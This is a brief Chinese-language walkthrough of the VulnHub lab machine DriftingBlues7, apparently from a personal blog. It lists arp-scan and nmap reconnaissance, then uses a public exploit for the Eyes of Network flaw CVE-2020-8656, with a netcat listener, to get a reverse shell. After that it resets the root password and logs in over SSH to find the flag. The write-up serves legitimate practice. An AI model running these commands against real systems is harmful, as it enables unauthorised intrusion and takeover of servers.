一:信息收集
1:主机发现
arp-scan -I eth0 10.9.23.0/24
kali的ip:10.9.23.112
靶机ip:10.9.23.93
2:端口扫描
nmap -A -p- -T4 10.9.23.93
开放了22,66,80,443,3306端口
3:端口探测
访问66端口,因为是上面运行了SimpleHttpServer
访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp
漏洞编号
CVE-2020-8656
找到一个可以利用的漏洞克隆到kali
https://github.com/h4knet/eonrce
git clone https://github.com/h4knet/eonrce.git
二:渗透测试
赋予执行权限
chmod +x eonrce.py
在Kali 开启监听
nc -lvvp 6666
运行脚本:
./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666
修改root的密码passwd root
由之前扫描发现开了ssh服务,我们用 ssh 连接靶机
ssh 10.9.23.93
发现最后flag
标签:eonrce,10.9,driftingblues7,端口,vulnhub,https,23.93,靶机 From: https://www.cnblogs.com/woaishuaidan/p/18053701